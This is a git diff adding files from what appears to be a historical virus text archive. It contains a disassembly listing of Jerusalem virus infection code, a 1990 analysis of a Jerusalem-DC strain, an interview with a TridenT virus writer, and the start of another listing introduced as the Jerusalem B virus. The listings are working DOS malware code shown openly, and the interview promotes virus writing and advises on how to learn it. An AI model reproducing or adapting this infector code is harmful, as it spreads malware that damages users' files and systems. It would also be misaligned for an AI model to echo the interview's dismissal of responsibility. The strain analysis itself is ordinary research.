+0000:049F  CD21                      INT     021H
+0000:04A1  E94301                    JMP     X05E7
+0000:04A4  FF068F00          X04A4:  INC     WORD PTR [Y008FH]
+0000:04A8  8EC0                      MOV     ES,AX
+0000:04AA  33F6                      XOR     SI,SI
+0000:04AC  8BFE                      MOV     DI,SI
+0000:04AE  B91007                    MOV     CX,0710H
+0000:04B1  F3A4                      REPE  MOVSB   
+0000:04B3  8BD7                      MOV     DX,DI
+0000:04B5  8B0E1100                  MOV     CX,[Y0011H]
+0000:04B9  8B1E7000                  MOV     BX,[Y0070H]
+0000:04BD  06                        PUSH    ES
+0000:04BE  1F                        POP     DS
+0000:04BF  B43F                      MOV     AH,03FH
+0000:04C1  CD21                      INT     021H
+0000:04C3  721C              X04C3:  JB      X04E1
+0000:04C5  03F9                      ADD     DI,CX
+0000:04C7  33C9                      XOR     CX,CX
+0000:04C9  8BD1                      MOV     DX,CX
+0000:04CB  B80042                    MOV     AX,04200H
+0000:04CE  CD21                      INT     021H
+
+"JV.MOC"                                                              PAGE  0010
+
+0000:04D0  BE0500                    MOV     SI,0005H
+0000:04D3  B90500                    MOV     CX,0005H
+0000:04D6  F32EA4                    REPE  MOVS    ES:BYTE PTR (DI),CS:BYTE PT
+                                                   R (SI)
+0000:04D9  8BCF                      MOV     CX,DI
+0000:04DB  33D2                      XOR     DX,DX
+0000:04DD  B440                      MOV     AH,040H
+0000:04DF  CD21                      INT     021H
+0000:04E1  720D              X04E1:  JB      X04F0
+0000:04E3  E9BC00                    JMP     X05A2
+0000:04E6  B91C00            X04E6:  MOV     CX,001CH
+0000:04E9  BA4F00                    MOV     DX,004FH
+0000:04EC  B43F                      MOV     AH,03FH
+0000:04EE  CD21                      INT     021H
+0000:04F0  724A              X04F0:  JB      X053C
+0000:04F2  C70661008419              MOV     WORD PTR [Y0061H],01984H
+0000:04F8  A15D00                    MOV     AX,Y005DH
+0000:04FB  A34500                    MOV     Y0045H,AX
+0000:04FE  A15F00                    MOV     AX,Y005FH
+0000:0501  A34300                    MOV     Y0043H,AX
+0000:0504  A16300                    MOV     AX,Y0063H
+0000:0507  A34700                    MOV     Y0047H,AX
+0000:050A  A16500                    MOV     AX,Y0065H
+0000:050D  A34900                    MOV     Y0049H,AX
+0000:0510  A15300                    MOV     AX,Y0053H
+0000:0513  833E510000                CMP     WORD PTR [Y0051H],0000H
+0000:0518  7401                      JZ      X051B
+0000:051A  48                        DEC     AX
+0000:051B  F7267800          X051B:  MUL     WORD PTR [Y0078H]
+0000:051F  03065100                  ADD     AX,[Y0051H]
+0000:0523  83D200                    ADC     DX,0000H
+0000:0526  050F00                    ADD     AX,000FH
+0000:0529  83D200                    ADC     DX,0000H
+0000:052C  25F0FF                    AND     AX,0FFF0H
+0000:052F  A37C00                    MOV     Y007CH,AX
+0000:0532  89167E00                  MOV     [Y007EH],DX
+0000:0536  051007                    ADD     AX,0710H
+0000:0539  83D200                    ADC     DX,0000H
+0000:053C  723A              X053C:  JB      X0578
+0000:053E  F7367800                  DIV     WORD PTR [Y0078H]
+0000:0542  0BD2                      OR      DX,DX
+0000:0544  7401                      JZ      X0547
+0000:0546  40                        INC     AX
+0000:0547  A35300            X0547:  MOV     Y0053H,AX
+0000:054A  89165100                  MOV     [Y0051H],DX
+0000:054E  A17C00                    MOV     AX,Y007CH
+0000:0551  8B167E00                  MOV     DX,[Y007EH]
+0000:0555  F7367A00                  DIV     WORD PTR [Y007AH]
+0000:0559  2B065700                  SUB     AX,[Y0057H]
+0000:055D  A36500                    MOV     Y0065H,AX
+0000:0560  C7066300C500              MOV     WORD PTR [Y0063H],00C5H
+0000:0566  A35D00                    MOV     Y005DH,AX
+0000:0569  C7065F001007              MOV     WORD PTR [Y005FH],0710H
+0000:056F  33C9                      XOR     CX,CX
+0000:0571  8BD1                      MOV     DX,CX
+0000:0573  B80042                    MOV     AX,04200H
+0000:0576  CD21                      INT     021H
+
+"JV.MOC"                                                              PAGE  0011
+
+0000:0578  720A              X0578:  JB      X0584
+0000:057A  B91C00                    MOV     CX,001CH
+0000:057D  BA4F00                    MOV     DX,004FH
+0000:0580  B440                      MOV     AH,040H
+0000:0582  CD21                      INT     021H
+0000:0584  7211              X0584:  JB      X0597
+0000:0586  3BC1                      CMP     AX,CX
+0000:0588  7518                      JNZ     X05A2
+0000:058A  8B167C00                  MOV     DX,[Y007CH]
+0000:058E  8B0E7E00                  MOV     CX,[Y007EH]
+0000:0592  B80042                    MOV     AX,04200H
+0000:0595  CD21                      INT     021H
+0000:0597  7209              X0597:  JB      X05A2
+0000:0599  33D2                      XOR     DX,DX
+0000:059B  B91007                    MOV     CX,0710H
+0000:059E  B440                      MOV     AH,040H
+0000:05A0  CD21                      INT     021H
+0000:05A2  2E833E8F0000      X05A2:  CMP     WORD PTR CS:[Y008FH],0000H
+0000:05A8  7404                      JZ      X05AE
+0000:05AA  B449                      MOV     AH,049H
+0000:05AC  CD21                      INT     021H
+0000:05AE  2E833E7000FF      X05AE:  CMP     WORD PTR CS:[Y0070H],0FFFFH
+0000:05B4  7431                      JZ      X05E7
+0000:05B6  2E8B1E7000                MOV     BX,CS:[Y0070H]
+0000:05BB  2E8B167400                MOV     DX,CS:[Y0074H]
+0000:05C0  2E8B0E7600                MOV     CX,CS:[Y0076H]
+0000:05C5  B80157                    MOV     AX,05701H
+0000:05C8  CD21                      INT     021H
+0000:05CA  B43E                      MOV     AH,03EH
+0000:05CC  CD21                      INT     021H
+0000:05CE  2EC5168000                LDS     DX,CS:[Y0080H]
+0000:05D3  2E8B0E7200                MOV     CX,CS:[Y0072H]
+0000:05D8  B80143                    MOV     AX,04301H
+0000:05DB  CD21                      INT     021H
+0000:05DD  2EC5161B00                LDS     DX,CS:[Y001BH]
+0000:05E2  B82425                    MOV     AX,02524H
+0000:05E5  CD21                      INT     021H
+0000:05E7  07                X05E7:  POP     ES
+0000:05E8  1F                        POP     DS
+0000:05E9  5F                        POP     DI
+0000:05EA  5E                        POP     SI
+0000:05EB  5A                        POP     DX
+0000:05EC  59                        POP     CX
+0000:05ED  5B                        POP     BX
+0000:05EE  58                        POP     AX
+0000:05EF  9D                        POPF    
+0000:05F0  2EFF2E1700                JMP     CS:[Y0017H]
+0000:05F5  0000              X05F5:  ADD     [BX+SI],AL
+0000:05F7  0000                      ADD     [BX+SI],AL
+0000:05F9  0000                      ADD     [BX+SI],AL
+0000:05FB  0000                      ADD     [BX+SI],AL
+0000:05FD  0000                      ADD     [BX+SI],AL
+0000:05FF  004D00                    ADD     [DI+00H],CL
+0000:0602  000F                      ADD     [BX],CL
+0000:0604  0000                      ADD     [BX+SI],AL
+0000:0606  0000                      ADD     [BX+SI],AL
+
+"JV.MOC"                                                              PAGE  0012
+
+0000:0608  0000                      ADD     [BX+SI],AL
+0000:060A  0000                      ADD     [BX+SI],AL
+0000:060C  0000                      ADD     [BX+SI],AL
+0000:060E  0000                      ADD     [BX+SI],AL
+0000:0610  CD20                      INT     020H
+0000:0612  00A0009A                  ADD     [BX+SI+Y09A00H],AH
+0000:0616  F0FE1D                    LOCK  CALL    [DI]        ; NOT VALID
+0000:0619  F02F                      LOCK  DAS     
+0000:061B  018E1E3C                  ADD     [BP+Y03C1EH],CX
+0000:061F  018E1EEB                  ADD     [BP+Y0EB1EH],CX
+0000:0623  048E                      ADD     AL,08EH
+0000:0625  1E                        PUSH    DS
+0000:0626  8E1EFFFF                  MOV     DS,[Y0FFFFH]
+0000:062A  FFFF                      ???     DI
+0000:062C  FFFF                      ???     DI
+0000:062E  FFFF                      ???     DI
+0000:0630  FFFF                      ???     DI
+0000:0632  FFFF                      ???     DI
+0000:0634  FFFF                      ???     DI
+0000:0636  FFFF                      ???     DI
+0000:0638  FFFF                      ???     DI
+0000:063A  FFFF                      ???     DI
+0000:063C  7C1F                      JL      X065D
+0000:063E  DE3E8D29                  ESC     037H,[Y0298DH]
+0000:0642  1400                      ADC     AL,00H
+0000:0644  1800                      SBB     [BX+SI],AL
+0000:0646  F1                        DB      0F1H
+0000:0647  1F                        POP     DS
+0000:0648  FFFF                      ???     DI
+0000:064A  FFFF                      ???     DI
+0000:064C  0000                      ADD     [BX+SI],AL
+0000:064E  0000                      ADD     [BX+SI],AL
+0000:0650  0000                      ADD     [BX+SI],AL
+0000:0652  0000                      ADD     [BX+SI],AL
+0000:0654  0000                      ADD     [BX+SI],AL
+0000:0656  0000                      ADD     [BX+SI],AL
+0000:0658  0000                      ADD     [BX+SI],AL
+0000:065A  0000                      ADD     [BX+SI],AL
+0000:065C  0000                      ADD     [BX+SI],AL
+0000:065E  0000                      ADD     [BX+SI],AL
+0000:0660  CD21                      INT     021H
+0000:0662  CB                        RET                       ; INTERSEGMENT
+0000:0663  0000              X0663:  ADD     [BX+SI],AL
+0000:0665  0000                      ADD     [BX+SI],AL
+0000:0667  0000                      ADD     [BX+SI],AL
+0000:0669  0000                      ADD     [BX+SI],AL
+0000:066B  0000                      ADD     [BX+SI],AL
+0000:066D  2020                      AND     [BX+SI],AH
+0000:066F  2020                      AND     [BX+SI],AH
+0000:0671  2020                      AND     [BX+SI],AH
+0000:0673  2020                      AND     [BX+SI],AH
+0000:0675  2020                      AND     [BX+SI],AH
+0000:0677  2000                      AND     [BX+SI],AL
+0000:0679  0000                      ADD     [BX+SI],AL
+0000:067B  0000                      ADD     [BX+SI],AL
+0000:067D  2020                      AND     [BX+SI],AH
+
+"JV.MOC"                                                              PAGE  0013
+
+0000:067F  2020                      AND     [BX+SI],AH
+0000:0681  2020                      AND     [BX+SI],AH
+0000:0683  2020                      AND     [BX+SI],AH
+0000:0685  2020                      AND     [BX+SI],AH
+0000:0687  2000                      AND     [BX+SI],AL
+0000:0689  0000                      ADD     [BX+SI],AL
+0000:068B  0000                      ADD     [BX+SI],AL
+0000:068D  0000                      ADD     [BX+SI],AL
+0000:068F  0000                      ADD     [BX+SI],AL
+0000:0691  0D6B6F                    OR      AX,06F6BH
+0000:0694  6465                      JZ      X06FB
+0000:0696  6572                      JNZ     X070A
+0000:0698  7A2E                      JPE     X06C8
+0000:069A  6578                      JNZ     X0714
+0000:069C  6520                      JNZ     X06BE
+0000:069E  613A                      JNO     X06DA
+0000:06A0  6B6F                      JPO     X0711
+0000:06A2  6465                      JZ      X0709
+0000:06A4  6572                      JNZ     X0718
+0000:06A6  2E6578                    JNZ     X0721
+0000:06A9  650D                      JNZ     X06B8
+0000:06AB  0000                      ADD     [BX+SI],AL
+0000:06AD  0000                      ADD     [BX+SI],AL
+0000:06AF  0000                      ADD     [BX+SI],AL
+0000:06B1  0000                      ADD     [BX+SI],AL
+0000:06B3  0000                      ADD     [BX+SI],AL
+0000:06B5  0000                      ADD     [BX+SI],AL
+0000:06B7  0000                      ADD     [BX+SI],AL
+0000:06B9  0000                      ADD     [BX+SI],AL
+0000:06BB  0000                      ADD     [BX+SI],AL
+0000:06BD  0000                      ADD     [BX+SI],AL
+0000:06BF  0000                      ADD     [BX+SI],AL
+0000:06C1  0000                      ADD     [BX+SI],AL
+0000:06C3  0000                      ADD     [BX+SI],AL
+0000:06C5  0000                      ADD     [BX+SI],AL
+0000:06C7  0000                      ADD     [BX+SI],AL
+0000:06C9  0000                      ADD     [BX+SI],AL
+0000:06CB  0000                      ADD     [BX+SI],AL
+0000:06CD  0000                      ADD     [BX+SI],AL
+0000:06CF  0000                      ADD     [BX+SI],AL
+0000:06D1  0000                      ADD     [BX+SI],AL
+0000:06D3  0000                      ADD     [BX+SI],AL
+0000:06D5  0000                      ADD     [BX+SI],AL
+0000:06D7  0000                      ADD     [BX+SI],AL
+0000:06D9  005718                    ADD     [BX+018H],DL
+0000:06DC  0825                      OR      [DI],AH
+0000:06DE  A5                        MOVSW   
+0000:06DF  FEC5                      INC     CH
+0000:06E1  07                        POP     ES
+0000:06E2  1E                        PUSH    DS
+0000:06E3  0210                      ADD     DL,[BX+SI]
+0000:06E5  07                        POP     ES
+0000:06E6  57                        PUSH    DI
+0000:06E7  18B10D47                  SBB     [BX+DI+Y0470DH],DH
+0000:06EB  0104                      ADD     [SI],AX
+0000:06ED  7F70                      JG      X075F
+
+"JV.MOC"                                                              PAGE  0014
+
+0000:06EF  0010                      ADD     [BX+SI],DL
+0000:06F1  07                        POP     ES
+0000:06F2  1D001C                    SBB     AX,01C00H
+0000:06F5  09A20D3D                  OR      [BP+SI+Y03D0DH],SP
+0000:06F9  0C1B                      OR      AL,01BH
+0000:06FB  02B10D02          X06FB:  ADD     DH,[BX+DI+Y020DH]
+0000:06FF  F24D                      REPNE  DEC     BP
+0000:0701  360E                      PUSH    CS
+0000:0703  0300                      ADD     AX,[BX+SI]
+0000:0705  0000                      ADD     [BX+SI],AL
+0000:0707  00EE                      ADD     DH,CH
+0000:0709  002A              X0709:  ADD     [BP+SI],CH
+0000:070B  0F                        POP     CS
+0000:070C  42                        INC     DX
+0000:070D  01C1                      ADD     CX,AX
+0000:070F  0DB44C                    OR      AX,04CB4H
+0000:0712  B000                      MOV     AL,00H
+0000:0714  CD21              X0714:  INT     021H
+0000:0716  4D                        DEC     BP
+0000:0717  7344                      JAE     X075D
+0000:0719  6F73                      JG      X078E
+
+
\ No newline at end of file
diff --git a/textfiles.com/virus/jeru-dc.vir b/textfiles.com/virus/jeru-dc.vir
new file mode 100644
index 00000000..9011c227
--- /dev/null
+++ b/textfiles.com/virus/jeru-dc.vir
@@ -0,0 +1,83 @@
+                                                          5 September 1990
+
+David,
+      I thought that you may want to see this....Please read it carefully
+      and compare notes on what you have and what you have documentation
+      for. Please get back to me as soon as possible to discuss the
+      situation. This is an analysis that I did today on the strain that I
+      D/L'ed from the NCSA Board....Go figure.   ,-)
+
+                                               -Paul
+
+
+===============================================================================
+
+
+This analysis was preformed under the following circumstances:
+
+
+Test machine:  AT 80286 Turbo Clone, Phoenix ROM-BIOS version 3.30, 1Mb RAM
+               (640 base, 384 extended), Seagate ST-225 21Mb Hard Dirve and
+               High Density (1.2 Mb) 5.25", 360 Kb Floppy Drive.
+
+Operating Sytem: Ms-DOS version 4.01
+
+Memory Mapping Utility: Central Point Software, Inc.,
+               "Memory Info", version 5.24
+
+Notes:         Clean, uninfected "goat" files (ie. .COM and .EXE) were
+               introduced into the viral environment for testing purposes.
+               The entire testing process is documented, in case you have
+               any particular questions.
+               McAfee Associates ViruScan version 66b identifies this virus
+               as Jerusalem B, but the differences in replication are
+               substantial enough to warrant a separate strain
+               classification. Comments, etc. are most certainly welcome.
+
+
+===============================================================================
+
+
+Virus: Jerusalem-DC
+-----  ------------
+
+       (Note - Yep, I stuck the DC strain-tag on this one..it does not possess
+       the same characteristics of any other of the documented strains,
+       although McAfee's ViruScan ID's it as J-B...  -Paul)
+
+Observations:
+-------------
+
+When an infected file is initially executed, the virus loads TSR. This can be
+observed with a memory mapping utility (see above). This also reveals that
+the infected file <name> has been loaded next TSR. It should also be
+annotated at this point that the program that was used to view memory at
+this point has, too, become infected. File size increases are as follows:
+
+   .COM files - 1813 bytes and will only be infected once. COMMAND.COM will
+                not become infected.
+
+   .EXE files - 1820 bytes initially; 1808 bytes upon each subsequent
+                infetion. (This seems almost inversely proportional to the
+                description of Spanish JB, or Jerusalem E2.)
+
+The "Black Box" effect is still apparent approx. 1/2 hour after the virus
+is loaded TSR, as it is in the original J-B virus. The usual text string
+"uSMsDOS" is not present in this strain.
+
+
+
+        Please direct any (more detailed) questions via message to:
+
+                The National Computer Security Association
+
+                                NCSA BBS,
+                             Washington, DC.
+                             (202) 364-1304
+                          300/1200/2400 at 8,N,1
+
+                 (Preferrably within the VIRUS Conference.)
+
+
+
+
\ No newline at end of file
diff --git a/textfiles.com/virus/jtinterv.iew b/textfiles.com/virus/jtinterv.iew
new file mode 100644
index 00000000..7c9a1653
--- /dev/null
+++ b/textfiles.com/virus/jtinterv.iew
@@ -0,0 +1,420 @@
+--------------------------------------------------------------------------------
+            INTERVIEW WITH JOHN TARDY / TRIDENT / THE NETHERLANDS
+--------------------------------------------------------------------------------
+
+ Give me a short description of who you are?
+
+- I am called John Tardy, born somewhere in the beginning of the 70ties.
+
+ From where did you get you handle, John Tardy?
+
+- In the beginning of time, I was fascinated by certain death metal
+  groups like Deicide and Obituary. The lead singer of the band is
+  John Tardy and has a hell of a voice. I wanted to adapt his name to
+  the underground also. If you know the first group, you know my handle
+  when I was young (and more childish than you can imagine. That Nazi-
+  virus was just nice compared to my first ones. They were insane).
+
+ When did you discovered the world of computers?
+
+- I think I was almost 10 years old, but I heard of PC's when in 1990 I
+  had my first PC...
+
+ How long have you been active in the scene?
+
+-  At the end of 1991, I wrote my first virus, but using another handle...
+
+How did you came into the virus business?
+
+- That's a nice confusing question. When I first got struck by a virus
+  myself, I was convinced of the menace of it. I wanted to kill these
+  things that ruined my PC. So I wanted to write a scanner or another
+  antivirus toolkit. I contacted several persons in The Netherlands,
+  including the author of TbScan, but they pulled me off. I wasn't
+  thrustworthy and so on... Then I read a document from Vesselin
+  Bonthev, about the Virus Exchange BBS's. You could only get a virus
+  from them if you wrote one yourself, he said. So I did....
+
+ What part(s) of the underground do you think needs improvements?
+
+- Hmm, I don't know... I like it how it is now...
+
+ Positive/negative aspects of the scene?
+
+- People promising they will release a super virus (targetting all kinds
+  of files), or a superb virus creation toolkit, but you won't see it
+  in years. Better bring it out first and then boast about it... You saw
+  and heard of TPE only when it was out...
+
+ Have you been involved in any other group that TridenT?
+
+  Yes, before I went to PC I was a demo coder and musician, but as it is
+  extremely difficult to get good information on PC about these things,
+  it's easier to write a virus.
+
+ Who started/created TridenT?
+
+  I did, together with Bit Addict. We thought it would bring more fame
+  if we worked together. Later we contacted the other people now in
+  TridenT.
+
+ What's the groups goal?
+
+- Hmmm, that's not really an easy one... We want to be known (which now
+  is the case), but we all have our personal goals also. I want to have
+  the fuzz cleared around the antivirus writers. If they were more open
+  to me, I didn't make a virus or even founded TridenT... I would be a
+  researcher then... I can't do that now, because of my history as a
+  virus writer, so I'll have to go on and on and on (blame them! Cartel
+  isn't good!)
+
+ How many people are you?
+
+- About 7 or so... It can vary...
+
+ What's their handles?
+
+- In alphabetical :
+  Bit Addict
+  Dark Helmet
+  DarkRay
+  John Tardy
+  Masud Khafir
+  Some are missing, but that's better for them, I think...
+
+ Do all of them program, if not, what's the others job?
+
+  We _only_ have coders, or should be... We don't have any hackers,
+  phreakers or that type of guys in our group, because of the lack of
+  interest in that.
+
+ Who are the "leading/head-persons" in the group?
+
+- Hmmm, let them speak for themselves, but I am only the founder, but
+  not the best programmer of the bunch. Bit Addict is surely the best
+  and Masud Khafir is on a second place, but we are not used to things
+  as "ratings", because we share the same interest.
+
+ What's your position in it?
+
+- I founded it (as said before (a few times)) and I code some things.
+  That's all. Nothing special... Well, sometimes I searched a new member
+  and pulled him into this (like Masud, Dark Helmet, etc.)
+
+ How is TridenT (currently) organized?
+
+- It was very well organized (own mailing system, etc.), but now we are
+  in a total void and it will take some time to recover, but I think
+  in a few months it will be better, or TridenT will not be here
+  anymore, as we all don't have very much time to write viruses
+  anymore, so...  Wait and see...
+
+ Have you got any contacts with other virus-groups/programmers?
+
+- No, I do not... I have to call much more then and I have a slight
+  problem regarding phone-bills ;-) And I don't want to phreak...
+
+ Can anyone ask for membership, or are you a "private" group?
+
+- Well, we never had anyone asking to come in... If we saw a very good
+  virus, I tried to trace the person who wrote it down and contacted him
+  and asked him if he wanted to join... If you see it that way, I think
+  it's a little bit private...
+
+ What does it take to join up?
+
+- I honestly don't know. If we saw a good virus (like coffeeshop or
+  gotcha!), we contacted the person. If people are far too willing to
+  join, I have to think twice...
+
+ You've programmed a lot of polymorphic things, and one of them is the
+ TPE, what comments have you received about it?
+
+- Well, you can better ask if we don't get any comments... Ask
+  Frans Veldman how he is doing detecting TPE 1.4... Silence... Ask any
+  other AV-writer. Only a very few can detect it reliably and even more
+  engines are popping up...
+
+ Will you continue to "upgrade" it or is it a finished project?
+
+- Ask Masud, he wrote it, but I think he is bored yet with it. He now
+  knows how to write such an engine and the challenge is taken, so he
+  goes on to the next challenge (Virus_For_Windows_1.4 or an OS/2
+  virus).
+
+ How many strains/mutations can it produce?
+
+- Euh.... I never counted it... It was sufficient to see the routines,
+  and I couldn't find many similarities.
+
+ Eventhough polymorphic engine's are a great thing, not many people
+ seems to use them? You have any theorie why then don't?
+
+- Yes, find one cloaked with the engine, find 'em all... If they broke
+  the polymorphic code, all viruses using it are known...
+
+ Which is the best polymorphic engine around today?
+
+- I like TPE 1.4 a lot... DMU (included with the Mirror virus) is also
+  nice. It's not very complicated, but it's very small (under 1K). The
+  Multiple Encryptor of Dark Angel (DAME) is very nice, escpecially the
+  double word encryption... Comment : Make them overlapping...
+
+ Have you aver thought of/are currently releasing some sort of
+ electronic magazine (text/executable/hardcopy)
+
+- We thought of it, but after a long(!) discussion in our net, we
+  decided not to do it. There are so many mags now, why writing one more
+  with debug scripts and sources of viruses. There's enough study
+  material. We planned to make a hypertext engine for writing viruses,
+  but that will take a while, as the programmer of it is lazy (he said
+  it himself!).
+
+ Are you into other things such as hacking and phreaking aswell, or just
+ viruses?
+
+- Now only viruses...
+
+ Do you have some network connection (some sort of e-mail or something)?
+
+- Well, we have our private TridenT network, but I had a connection
+  on email, but I think I am sorta locked out...
+
+ Can you name a few viruses/engines that members of TridenT have
+ written?
+
+- Yes, for example : Pogue, PlayGame, TPE, Mirror, Circus Clusters,
+  Cybertech, Servant, Thunderdome, Civil War, Weirdo, Horns of Jericho,
+  Flue, April30, Bit Addict (the non-destructive ones), OW 0-10,
+  New Creeping Death, Smile, Yeah and many, many others.
+
+ Which of them have you written yourself?
+
+  There are many... I guess around 60 or so... But the most known are
+  Circus Clusters, Servant and OW 0-10. Some other viruses like deicide
+  are the be known as myne, but it's not with this name and I don't
+  want to be assosiated with the old name anymore.
+
+ Which one was the hardest to write?
+
+- Circus Clusters was an interesting experiment, and I had a little
+  trouble making the virus stable enough (which you could see in an
+  old crypt newsletter, I made it up for you in a newer one).
+
+ Do you have any sort of company or law-enforcement who are trying
+ bust TridenT?
+
+- I guess so, we have released an awful lot of viruses in a relatively
+  short time, so I wouldn't be suprised if CRI or so are watching us
+  carefully, but I think we aren't illegal in any way. I never released
+  my viruses in the wild, only as source or in an archive accompanied by
+  a message and/or source code.
+
+ If so, are they a real threat or just "childish"?
+
+  I think they could be a real threat, not only for us, but for
+  censoring the whole scene. That would be very bad. I am not so
+  worried for myself, but more about the fact that the antivirus
+  business has become a very awful thing with CARO which wanted to
+  set up a murky database and hunt people down.
+
+ Have you ever had any trouble in the group with the result of kicked
+ member(s)?
+
+- No... Sometimes we have a discussion getting around, but it's only a
+  matter of time before it dissolves. No one ever has been kicked out
+  and only will be if he can be really dangerous to other members.
+
+ Do you call a lot, and if so how (phone/internet etc.)
+
+- I used to call a lot, but when momma saw the phone-bill, I have to
+  stay put.. I didn't call any board since a month and it will take
+  some time before I can begin again... (Gotta pay first).
+
+ Do you have any couriers that spread your products around?
+
+- Well, if you mean uploading viruses to unsuspecting users, I must say
+  "NO". Only interested people can get it from us. We used to drop it
+  on "Arrested Development" on that time, but are now using another
+  base that will be much more informative (no hard feelings, AD!).
+
+ What do you think about the laws against h/p/v that has arrived lately?
+
+  It's a very sad business. What I want to do on _my_ computers is no
+  ones business. If I want to release a virus on my system, who's to say
+  I may not? And giving source code to someone to see how a virus works,
+  is _that_ illegal? They're just plain textfiles! Other people compile
+  and release them, it's not my responsibility. They can also watch and
+  say "This is nice" and then throw it away. The laws in The Netherlands
+  are vague and not very specific. These laws would also make virus
+  researchers illegal if they send samples to eachother.
+
+ What do you think about various news-papers thinking us as nerds?
+
+  Have a good laugh at them. I just wear hair curlers in my beard and
+  a condom on my nose in order to ward off radiation (hello Dr. J.
+  Popp! (Aids Trojan)). No let them think their way, I think my way.
+
+ Has the scene in any way influented on your real life?
+
+  No. I'm absolutely schizo! In real life I am ...#^#%$#@ and then it's
+  like a switch is pulled over and I am John Tardy of TridenT. Sometimes
+  it's like there are two persons in me, and can't even remember what
+  virus I actually wrote... Luckily enough it's for me to switch over,
+  so I don't need any doctor or something like that. I think everyone
+  has two persons in him, but they opress the other side. Quite
+  interesting, but not in this issue.
+
+ Whould you feel guilty if one of your viruses made damage to a
+ hospital?
+
+- Yes. For me it's only to get other viruses to research or for learning
+  the inner tricks of DOS. If by some programming fault of mine a person
+  in a hospital gets a lethal injection, I would be terribly sorry
+  indeed, because that's never what I wanted.
+
+ Do you see any differences between the scene now and a couple of years
+ ago (concerning the underground part of course)?
+
+- No, but I do hear a lot more of more people. The first groups that
+  were then very young (and childish) are now grown up (Phalcon/Skism)
+  and have become very talented programmers. Now the new groups are
+  popping up (Immortal Riot) and are just behaving like Nuke in the
+  beginning. But that's a stage we all have to pass.
+
+ Which virus-magazine do you think is the best available nowadays?
+
+  I read 40Hex with pleasure and reading score is high. The Nuke
+  Infojournal contains a lot of rubbish for me (I am not interested in
+  phreaking) and it's a pain for me to download it.
+
+ Which virus-group/programmer do you admire/like?
+
+- The best programmer I've ever seen is Bit Addict. He doesn't make a
+  virus very often, but when he finally makes one, it's a very nice one.
+  In the beginning I admired Dark Avenger, but I didn't like his INT13
+  or INT26 routines at all. I must say, he started with the nice ideas
+  and the (even) more talented programmers progress on his work
+  (mutation engines).
+
+ Which country is the best virus-writing today?
+
+- Well, I don't think it depends on country anymore, because of the
+  international virus groups, but I think it's TridenT together with
+  Phalcon/Skism that produces the best viruses. Don't understand me
+  wrong, but Nuke has a stealth routine which they must alter, because
+  it doesn't work if you wanna stealth a virus on a write protected
+  disk. Look at "Mirror" of Bit Addict and I think you have a nice
+  playground!
+
+ Which virus-group(s) do you think is the best?
+
+- TridenT and Phalcon/Skism, as they solely produce nice viruses and
+  don't do any side activities like hacking/phreaking...
+
+ What do you think about these virus generators, such as VCL and PS-MPC?
+
+- Nice, but real virus writers create their own code, but it's nice to
+  see it working and you can sometimes learn from the generated source
+  code.
+
+ What do you think about such individues as board-crashers?
+
+- ~~~+++~~~ ATH0   or simply : hangup!
+
+ Describe the perfect virus :
+
+- A fully stealth virus using polymorphic techniques and various
+  ways of infecting strange types of file to escape total annihilation.
+  (infecting OBJ or NLM's). Read for a perfect description the text
+  Vesselin Bontchev wrote (Possible attacks of a computer virus).
+
+ Describe the perfect viruscoder :
+
+  A person that is totally unaware of his other side and can live two
+  lives apart, his dark side and his normal side.
+
+ Describe the AV-community with a few lines :
+
+- I don't like all commercial products, but encourage shareware, as it
+  is also for the normal computer user important to protect their
+  computer.
+
+ Which AV-program do you think is the best, and why?
+
+- I like Thunderbyte, but it has some flaws. I like DEBUG a lot ;-)
+
+ What do you think about the underground's future?
+
+- I don't know how long it will last, but I think the next generations
+  of virus groups will only write Windows NT or OS/2 viruses.
+
+Do you know/heard of any new technics coming in the near future?
+
+- Yes. I think the new breed of viruses will analyse any type of code
+  run and tries to insert it somewhere in there. With protected mode
+  programming it's possible to stay away from any scanner and control
+  everything. As a result, such virus could infect a .MOD file somewhere
+  halfway if it's contains executable code which is run. Also own
+  compression mechanisms are nice (take Cruncher for an example, but it
+  utilized the Diet algorithm).
+
+ Any advice to people who want's to learn the basic of virus-writing?
+
+- Buy a good book of P. Norton and read some virus mags. It's all you
+  will need nowadays. For excellent ideas read the mail of Vesselin
+  Bontchev. Sometimes without realizing it he gives good ideas...
+
+ Can you be reached somewhere (on a board/e-mail address/internet)?
+
+- No, only a few people can contact me, because my shortage of time...
+  I was on echomail, but I think my account is gone.
+
+ Something else you wish to say?
+
+  Well, I'll send you the letter The Unforgiven never seemed to receive
+  and a message to the antivirus community :
+
+   "If you had helped me in the first place, there wouldn't be a
+    John Tardy or a TridenT. Think that over again and help people
+    who want to support the antivirus community. For me it's too
+    late to return, but other interested users can be helped. Only
+    of this commercial behaviour some people start writing them.
+    Think twice. Big mouths but even bigger fools sometimes."
+
+ Do you wish to send any greets?
+
+- Yes, but the list is very long, so I greet here : Phalcon/Skism, Nuke,
+  ofcourse the rest of Immortal Riot, The Crypt Newsletter staff and
+  Arrested Development. Further greets to all other virus writers who
+  doesn't make destructive viruses.
+
+  John Tardy / TridenT
+
+  My last words for now :
+
+    INCENDERE SUUS
+    DAMNARE SUUS VITA
+    DARE SUUS AD ART VENTUS
+    CAPARE SUUS
+    ET FACERE SUUS
+    FERIRE SUUS PERSICUM CUTIS
+
+    NUDUS, TURPIS
+    PUTRIDUS, FINDERE.
+
+    ACERBUS, CRUDUS,
+    RAPTUS, CONTEMPTIO.
+
+    MORDAX, ATTERERE
+    INFICERE, BILIS.
+    NAM TUUS SCELUS
+    AMABILIS
+    TU LICET PERIRE
+    AD ANTE TU
+    HABERE AEQUUS SIC
+    DOLOR NIL FINIS
+    EGO LIBERARE ART ULTIMUS INIURIA.
+
+  Ps. The last thing is to read over for the smart ones. Read it and think.
+  Intelligence is our most dangerous weapon.
\ No newline at end of file
diff --git a/textfiles.com/virus/jvvirus.txt b/textfiles.com/virus/jvvirus.txt
new file mode 100644
index 00000000..25c95d0a
--- /dev/null
+++ b/textfiles.com/virus/jvvirus.txt
@@ -0,0 +1,814 @@
+This is the Jerusalem B Virus.
+"JV.MOC"                                                              PAGE  0001
+
+0000:0000  E99200                    JMP     X0095
+0000:0003  7355                      JAE     X005A
+0000:0005  4D                        DEC     BP
+0000:0006  7344                      JAE     X004C
+0000:0008  6F73                      JG      X007D
+0000:000A  0001                      ADD     [BX+DI],AL
+0000:000C  BD1700                    MOV     BP,0017H
+0000:000F  0000                      ADD     [BX+SI],AL
+0000:0011  06                        PUSH    ES
+0000:0012  00A5FE00                  ADD     [DI+Y00FEH],AH
+0000:0016  F016                      LOCK  PUSH    SS
+0000:0018  17                        POP     SS
+0000:0019  7702                      JA      X001D
+0000:001B  BF053D                    MOV     DI,03D05H
